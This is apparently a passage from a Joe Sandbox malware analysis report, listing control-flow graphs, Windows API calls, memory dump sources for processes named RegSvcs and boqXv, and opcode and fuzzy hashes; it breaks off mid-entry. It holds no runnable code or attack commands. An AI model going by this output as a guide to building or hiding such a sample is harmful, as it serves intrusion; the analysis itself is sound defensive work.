                                                                      control_flow_graph 1128 59aad60-59aad6f 1129 59aad9b-59aad9f 1128->1129 1130 59aad71-59aad7e call 59aa110 1128->1130 1132 59aadb3-59aadf4 1129->1132 1133 59aada1-59aadab 1129->1133 1136 59aad80-59aad8e call 59aafe9 1130->1136 1137 59aad94 1130->1137 1139 59aae01-59aae0f 1132->1139 1140 59aadf6-59aadfe 1132->1140 1133->1132 1136->1137 1147 59aaed0-59aaf90 1136->1147 1137->1129 1141 59aae33-59aae35 1139->1141 1142 59aae11-59aae16 1139->1142 1140->1139 1144 59aae38-59aae3f 1141->1144 1145 59aae18-59aae1f call 59aa11c 1142->1145 1146 59aae21 1142->1146 1150 59aae4c-59aae53 1144->1150 1151 59aae41-59aae49 1144->1151 1148 59aae23-59aae31 1145->1148 1146->1148 1179 59aaf98-59aafc3 GetModuleHandleW 1147->1179 1180 59aaf92-59aaf95 1147->1180 1148->1144 1154 59aae60-59aae69 call 59a32c4 1150->1154 1155 59aae55-59aae5d 1150->1155 1151->1150 1159 59aae6b-59aae73 1154->1159 1160 59aae76-59aae7b 1154->1160 1155->1154 1159->1160 1161 59aae99-59aaea6 1160->1161 1162 59aae7d-59aae84 1160->1162 1169 59aaea8-59aaec6 1161->1169 1170 59aaec9-59aaecf 1161->1170 1162->1161 1164 59aae86-59aae96 call 59a8c80 call 59aa12c 1162->1164 1164->1161 1169->1170 1181 59aafcc-59aafe0 1179->1181 1182 59aafc5-59aafcb 1179->1182 1180->1179 1182->1181
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.2479900105.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_59a0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: eedfc926674274cf1272b648582f8b45504108368fea1377ac2844d8a011510c
                                                                      • Instruction ID: dfddf7fc58862524c191a64b69875ab89418289e08cb24edb660b6fdbc7b71c8
                                                                      • Opcode Fuzzy Hash: eedfc926674274cf1272b648582f8b45504108368fea1377ac2844d8a011510c
                                                                      • Instruction Fuzzy Hash: 4A814871A00B059FD724DF2AD44476ABBF6FF88200F10892DD456DBA50D775E949CBE0
                                                                      Function 059ACEE5 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1315 59acee5-59acee7 1316 59acee9-59acf10 call 59aa2cc 1315->1316 1317 59acf1d-59acf96 1315->1317 1320 59acf15-59acf16 1316->1320 1321 59acf98-59acf9e 1317->1321 1322 59acfa1-59acfa8 1317->1322 1321->1322 1323 59acfaa-59acfb0 1322->1323 1324 59acfb3-59ad052 CreateWindowExW 1322->1324 1323->1324 1326 59ad05b-59ad093 1324->1326 1327 59ad054-59ad05a 1324->1327 1331 59ad0a0 1326->1331 1332 59ad095-59ad098 1326->1332 1327->1326 1333 59ad0a1 1331->1333 1332->1331 1333->1333
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 059AD042
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.2479900105.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_59a0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: abf42b1290de216bea26beea4cdabc75a665ce48ab2ac989347a9474467894bb
                                                                      • Instruction ID: 2645e5c85f9e7879da4a9f7201b2417226df6afea90680aa1738d23ceaf749a0
                                                                      • Opcode Fuzzy Hash: abf42b1290de216bea26beea4cdabc75a665ce48ab2ac989347a9474467894bb
                                                                      • Instruction Fuzzy Hash: B251E072C00349AFDF15CF99C884ADEBFB6BF48310F54812AE918AB220D7759995CF90
                                                                      Function 059ACF24 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1334 59acf24-59acf96 1336 59acf98-59acf9e 1334->1336 1337 59acfa1-59acfa8 1334->1337 1336->1337 1338 59acfaa-59acfb0 1337->1338 1339 59acfb3-59acfeb 1337->1339 1338->1339 1340 59acff3-59ad052 CreateWindowExW 1339->1340 1341 59ad05b-59ad093 1340->1341 1342 59ad054-59ad05a 1340->1342 1346 59ad0a0 1341->1346 1347 59ad095-59ad098 1341->1347 1342->1341 1348 59ad0a1 1346->1348 1347->1346 1348->1348
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 059AD042
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.2479900105.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_59a0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: 2f9d0fa37100d159defabc15563ffb7cdf1cf7bf5f8f2a5e79e934a5cf460d9f
                                                                      • Instruction ID: a1918f8c3e8cf381d6deacbfaf335d2fe2968dd0fd76670e145f2e88dde4b7e4
                                                                      • Opcode Fuzzy Hash: 2f9d0fa37100d159defabc15563ffb7cdf1cf7bf5f8f2a5e79e934a5cf460d9f
                                                                      • Instruction Fuzzy Hash: 8751BFB1D003599FDB14CFA9C884ADEBFB5FF48310F64812AE819AB250D7759985CF90
                                                                      Function 059ACF30 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1349 59acf30-59acf96 1350 59acf98-59acf9e 1349->1350 1351 59acfa1-59acfa8 1349->1351 1350->1351 1352 59acfaa-59acfb0 1351->1352 1353 59acfb3-59acfeb 1351->1353 1352->1353 1354 59acff3-59ad052 CreateWindowExW 1353->1354 1355 59ad05b-59ad093 1354->1355 1356 59ad054-59ad05a 1354->1356 1360 59ad0a0 1355->1360 1361 59ad095-59ad098 1355->1361 1356->1355 1362 59ad0a1 1360->1362 1361->1360 1362->1362
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 059AD042
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.2479900105.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_59a0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: bca15b31a5b675699b18da4d7ece6771467e3d6db7bfe3e3a4d2c3e99b4d12f0
                                                                      • Instruction ID: efb72deda489544fa79a9f5a0b91beaa0fed1e3fb595ef32f5697bb6ed468094
                                                                      • Opcode Fuzzy Hash: bca15b31a5b675699b18da4d7ece6771467e3d6db7bfe3e3a4d2c3e99b4d12f0
                                                                      • Instruction Fuzzy Hash: B441AEB1D103199FDB14CF99C884ADEBFB5FF48310F64812AE819AB250D7759985CF90
                                                                      Function 059AA41C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1363 59aa41c-59af6bc 1366 59af76c-59af78c call 59aa2f4 1363->1366 1367 59af6c2-59af6c7 1363->1367 1374 59af78f-59af79c 1366->1374 1369 59af71a-59af752 CallWindowProcW 1367->1369 1370 59af6c9-59af700 1367->1370 1371 59af75b-59af76a 1369->1371 1372 59af754-59af75a 1369->1372 1377 59af709-59af718 1370->1377 1378 59af702-59af708 1370->1378 1371->1374 1372->1371 1377->1374 1378->1377
                                                                      APIs
                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 059AF741
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.2479900105.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_59a0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: CallProcWindow
                                                                      • String ID:
                                                                      • API String ID: 2714655100-0
                                                                      • Opcode ID: cb7b57e764c2e4384fd929beb78e312ca30449b077857a436fb1b238225c0492
                                                                      • Instruction ID: 1742ed16ada2ada3f7b3c83f5eeb5099b1dfc19cc45d08392ff3b03308a7f3ba
                                                                      • Opcode Fuzzy Hash: cb7b57e764c2e4384fd929beb78e312ca30449b077857a436fb1b238225c0492
                                                                      • Instruction Fuzzy Hash: 88412AB9A003098FDB15CF99C448BAABBF5FF88314F258859D519AB321D774A841CFA0
                                                                      Function 01537350 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1380 1537350-15373a2 1382 15373a4-15373a7 1380->1382 1383 15373aa-15373d5 DeleteFileW 1380->1383 1382->1383 1384 15373d7-15373dd 1383->1384 1385 15373de-1537406 1383->1385 1384->1385
                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 015373C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.2468113438.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_1530000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: f6294b8e22670b9f60e196f5aad2de937fd935deb8c0cd9310e7b6e530c2407d
                                                                      • Instruction ID: 94a902a855b02c5b0b570eee65bf9bf0d78c9d1e474d870275bef06392f587a9
                                                                      • Opcode Fuzzy Hash: f6294b8e22670b9f60e196f5aad2de937fd935deb8c0cd9310e7b6e530c2407d
                                                                      • Instruction Fuzzy Hash: 482129B1C0065A9FDB14CF99D5457AEFBF0FF48320F11852AD814A7640D7389945CFA0
                                                                      Function 01537358 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1388 1537358-15373a2 1390 15373a4-15373a7 1388->1390 1391 15373aa-15373d5 DeleteFileW 1388->1391 1390->1391 1392 15373d7-15373dd 1391->1392 1393 15373de-1537406 1391->1393 1392->1393
                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 015373C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.2468113438.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_1530000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: ff1b767abbea523b7a36ef3cec16182e7c9d48fa4a483b69492b77518c6f4e4f
                                                                      • Instruction ID: beceffb93f29133cc34f21cf1d8675b9b4f81a55208f758bd5d54b6247b01988
                                                                      • Opcode Fuzzy Hash: ff1b767abbea523b7a36ef3cec16182e7c9d48fa4a483b69492b77518c6f4e4f
                                                                      • Instruction Fuzzy Hash: 241147B1C0065A9FDB14CF9AD445B9EFBF4FF48320F10812AD918A7240D738A941CFA1
                                                                      Function 064AD204 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1396 64ad204-64ae66e 1398 64ae676-64ae6a4 GlobalMemoryStatusEx 1396->1398 1399 64ae6ad-64ae6d5 1398->1399 1400 64ae6a6-64ae6ac 1398->1400 1400->1399
                                                                      APIs
                                                                      • GlobalMemoryStatusEx.KERNELBASE(4C064ABB), ref: 064AE697
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.2480284818.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_64a0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemoryStatus
                                                                      • String ID:
                                                                      • API String ID: 1890195054-0
                                                                      • Opcode ID: 47cf17d557096bc3a4ef66e33f1b459cd29879bd878e2ee897c43fca436cbf68
                                                                      • Instruction ID: fae08c036aff0bc1942d27e3a7bda791e4a688d440a200d838352aad05080d5f
                                                                      • Opcode Fuzzy Hash: 47cf17d557096bc3a4ef66e33f1b459cd29879bd878e2ee897c43fca436cbf68
                                                                      • Instruction Fuzzy Hash: B21133B1C0025A9FCB10DF9AC445B9EFBF4AB08220F10852AD918A7340D378A941CFE5
                                                                      Function 064AE628 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1403 64ae628-64ae6a4 GlobalMemoryStatusEx 1405 64ae6ad-64ae6d5 1403->1405 1406 64ae6a6-64ae6ac 1403->1406 1406->1405
                                                                      APIs
                                                                      • GlobalMemoryStatusEx.KERNELBASE(4C064ABB), ref: 064AE697
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.2480284818.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_64a0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemoryStatus
                                                                      • String ID:
                                                                      • API String ID: 1890195054-0
                                                                      • Opcode ID: 96cf3af69370d350d0626c72b12947fed2ceae978157e85e467faebb14e73c78
                                                                      • Instruction ID: e0d0aa3eb0eae5ce0c78a89c6c95e2a4e3f360a1dc5803b3d59cb3605cbbd4ff
                                                                      • Opcode Fuzzy Hash: 96cf3af69370d350d0626c72b12947fed2ceae978157e85e467faebb14e73c78
                                                                      • Instruction Fuzzy Hash: 5C1123B1C0025A9FDB10CF9AD445BDEFBF5AF48320F14852AD928A7340D778A951CFA1
                                                                      Function 059AA110 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1409 59aa110-59aaf90 1411 59aaf98-59aafc3 GetModuleHandleW 1409->1411 1412 59aaf92-59aaf95 1409->1412 1413 59aafcc-59aafe0 1411->1413 1414 59aafc5-59aafcb 1411->1414 1412->1411 1414->1413
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,059AAD7C), ref: 059AAFB6
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.2479900105.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_59a0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: b5917e35b91f21f8e9373c4c34e59ddd5602bbc581d8d23be6ec56573e507461
                                                                      • Instruction ID: 9231b22e2c3327b5d1d6518db47f34c96cb94504aeba8506f5729ee3d77968e2
                                                                      • Opcode Fuzzy Hash: b5917e35b91f21f8e9373c4c34e59ddd5602bbc581d8d23be6ec56573e507461
                                                                      • Instruction Fuzzy Hash: 231102B6C043498FCB24DF9AC844B9EFBF9EB88214F10842AD919B7250D379A545CFE1
                                                                      Function 0143D01C Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.2467621434.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_143d000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a5df7e4a6afe5a3fd084975aab4daf37ed3908846982ef8f4799a57b7ef1aa8f
                                                                      • Instruction ID: feaae46d6fae4e9660c1414ed18c88b66454129b7c94d1903f7e785eda398d85
                                                                      • Opcode Fuzzy Hash: a5df7e4a6afe5a3fd084975aab4daf37ed3908846982ef8f4799a57b7ef1aa8f
                                                                      • Instruction Fuzzy Hash: 0C21F1B1A042009FDB15DF54D984B16FB75EB88618F60C56AD84A0B3A6C336D407CA61
                                                                      Function 0143D006 Relevance: .1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.2467621434.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_143d000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b0988d6f7b70dae17fcd8fbba4c54c6e02240fcc8f91a51a1f9023370cf946ef
                                                                      • Instruction ID: 79fd3daaa6ae354ed55319e628b9be221b34c8f409db85fa4ab03994e65e65da
                                                                      • Opcode Fuzzy Hash: b0988d6f7b70dae17fcd8fbba4c54c6e02240fcc8f91a51a1f9023370cf946ef
                                                                      • Instruction Fuzzy Hash: BA2180755093808FCB06CF64D590716BF71EB86214F28C5DBD8498F2A7C33A980ACB62

                                                                      Executed Functions

                                                                      Function 01441340 Relevance: .5, Instructions: 541COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1358179353.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_1440000_boqXv.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7950077c08cd2f7b57339077d7bc93b9228c3893d041328e8cb06d09142fa5f3
                                                                      • Instruction ID: c99052ccf8f12fddb4a1de693a914abcea0a7cb843b786c2ff2dab3ed9ffd407
                                                                      • Opcode Fuzzy Hash: 7950077c08cd2f7b57339077d7bc93b9228c3893d041328e8cb06d09142fa5f3
                                                                      • Instruction Fuzzy Hash: 25226C74700205DFEB24EF78E8A062A77A6BB88705F55893EC5568739DDB31EC82CB50
                                                                      Function 01440BC0 Relevance: .3, Instructions: 336COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1358179353.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_1440000_boqXv.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8877f19c596bf5e866b62d5f98b88fc530d1f76b3fe34d036bebe6d24fa72540
                                                                      • Instruction ID: c8fe222ff3a4eee8d07992909d190cc5741d21828647312feb33af01e69a9504
                                                                      • Opcode Fuzzy Hash: 8877f19c596bf5e866b62d5f98b88fc530d1f76b3fe34d036bebe6d24fa72540
                                                                      • Instruction Fuzzy Hash: 1381D475A00305CFEB259F74D4186AEBFF2EF88310F18856AD54697368DB71AC96CB40
                                                                      Function 01441230 Relevance: .1, Instructions: 86COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1358179353.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_1440000_boqXv.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 285afeb52b73d08a7a55a9ea1a1f87d5090c8b4a8682afd8a44cf3b5bf656108
                                                                      • Instruction ID: 8bb435b4e6da9da0808ca980b199287ef7dcd24532c01c728dbb45c2fdf987ef
                                                                      • Opcode Fuzzy Hash: 285afeb52b73d08a7a55a9ea1a1f87d5090c8b4a8682afd8a44cf3b5bf656108
                                                                      • Instruction Fuzzy Hash: 4731F875B412108FD799AF38C458A2D7BE2AF8A71636108B9E506CF771DE36DC42CB80
                                                                      Function 01441239 Relevance: .1, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1358179353.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_1440000_boqXv.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5af4e9b1e4b6bc008580342b218c613ff3a5b1305b42623c282e08cbdfa8157a
                                                                      • Instruction ID: 03b7a3d4ecf3570c2b99378500dcf13bfb6876fc7f6548e656eb24c5ff98ae92
                                                                      • Opcode Fuzzy Hash: 5af4e9b1e4b6bc008580342b218c613ff3a5b1305b42623c282e08cbdfa8157a
                                                                      • Instruction Fuzzy Hash: 7521D635B412108FD7A9AF38C458A2D7BE2AF8971636118B9E506CF775DE36DC42CB80
                                                                      Function 01441240 Relevance: .1, Instructions: 81COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1358179353.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_1440000_boqXv.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5988677a73cc3412fe23b6e7323e0f6075948095abccaf119ca626ab26fda620
                                                                      • Instruction ID: 562d0ca325a907368d2025047d5f27368e498f4d7e734359b880b86af900af0f
                                                                      • Opcode Fuzzy Hash: 5988677a73cc3412fe23b6e7323e0f6075948095abccaf119ca626ab26fda620
                                                                      • Instruction Fuzzy Hash: 0F21D635B412108FD799AB38C458A2D7BA2AF8971636114B8E506CF771DA36DC42CB90
                                                                      Function 01441AE0 Relevance: .1, Instructions: 66COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1358179353.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_1440000_boqXv.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 76288dfcd6de4665a9aa47d7947a413edd2cdffa11ee5514d315f71e24c94564
                                                                      • Instruction ID: c9547884d15a8b78c3230b717b5462f13cb11553d6f0dc93e1b0c044d57cf3c5
                                                                      • Opcode Fuzzy Hash: 76288dfcd6de4665a9aa47d7947a413edd2cdffa11ee5514d315f71e24c94564
                                                                      • Instruction Fuzzy Hash: FF11E674F002089FC714EBB9E46179D7BB6EF85200F1040A9C106DB3A5DE309D07CB94
                                                                      Function 01441C09 Relevance: .0, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1358179353.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_1440000_boqXv.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: eaab2a378f5a16e0f7b84cb131809e6a04b9fdfcb765a9803541fbc1d8ff7288
                                                                      • Instruction ID: ce6bce55d4f5b19612c0a114f97a16281431595de1eb32af8c6eb91a6b5db0f2
                                                                      • Opcode Fuzzy Hash: eaab2a378f5a16e0f7b84cb131809e6a04b9fdfcb765a9803541fbc1d8ff7288
                                                                      • Instruction Fuzzy Hash: 0611A176E002099FCB40EFF8D8509AAFBF1FF8930071185AAE514A7225E731A911CB90
                                                                      Function 01441C10 Relevance: .0, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1358179353.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_1440000_boqXv.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 50a8d5a4711994dfe3ac57196985398a41686111e135abe3f7e23374f153d536
                                                                      • Instruction ID: 9fa1d8cc9b05d1303f1e3d057f580bb647e519e2882c6fd3d2f4eb0392d98774
                                                                      • Opcode Fuzzy Hash: 50a8d5a4711994dfe3ac57196985398a41686111e135abe3f7e23374f153d536
                                                                      • Instruction Fuzzy Hash: DB019235E002099FCB40EFF9D8408AFFBF5FF89300711866AE51597224E730A911CB90
                                                                      Function 01440880 Relevance: .0, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1358179353.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_1440000_boqXv.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fb8e0857e9051d5c729ab0efabf3b7f629b99065740e4b4f46affd1eefb2a83c
                                                                      • Instruction ID: ce7d2291caa618b0fa971381fb99515b0c08df8263a0ce18fb913a40836efd1c
                                                                      • Opcode Fuzzy Hash: fb8e0857e9051d5c729ab0efabf3b7f629b99065740e4b4f46affd1eefb2a83c
                                                                      • Instruction Fuzzy Hash: C5F0E2B1E0D38AAFDB62ABB4A9040DDBFF05D86220F1405BFC4D5D71A2FA744914CB92
                                                                      Function 01440889 Relevance: .0, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1358179353.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_1440000_boqXv.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5365f750b637c69464bacb9ceab8061844a668e3b543ec870274ed11880d6773
                                                                      • Instruction ID: a6541500692d91c900830f7fe9c83380f221d802eda2e08afb977cf706336247
                                                                      • Opcode Fuzzy Hash: 5365f750b637c69464bacb9ceab8061844a668e3b543ec870274ed11880d6773
                                                                      • Instruction Fuzzy Hash: C7F0A771D093499FCB51ABB499051DD7FF45D86220B1405ABC495D7152F5740910CB92
                                                                      Function 01440F9D Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1358179353.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_1440000_boqXv.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 84f86a1fb545a315cd1825be3066229122ea48592df2d9f6c1d8102561989d36
                                                                      • Instruction ID: e6817fdada81245b875c14b29701c1df39020b5c286e92d78e33a752000408be
                                                                      • Opcode Fuzzy Hash: 84f86a1fb545a315cd1825be3066229122ea48592df2d9f6c1d8102561989d36
                                                                      • Instruction Fuzzy Hash: D6F01C74900345CFEB24DF68C158B9E7BB0AB08B04F24085AD502AB360DBB498C4CB51
                                                                      Function 014408A8 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1358179353.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_1440000_boqXv.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 184ab476f88acc3aa34cda64fe21700f597e00f0f3e7ea51a8a53853f4728160
                                                                      • Instruction ID: 291d08ded1532057ba1fbed53a044449043ef9983312238f66eaed397175bc15
                                                                      • Opcode Fuzzy Hash: 184ab476f88acc3aa34cda64fe21700f597e00f0f3e7ea51a8a53853f4728160
                                                                      • Instruction Fuzzy Hash: 4CD017B1D01219AF8B40EFB899051DEBBF8EE08250F100566DA09E3200F2705A108BD1

                                                                      Executed Functions

                                                                      Function 013D1340 Relevance: .5, Instructions: 525COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1439848046.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
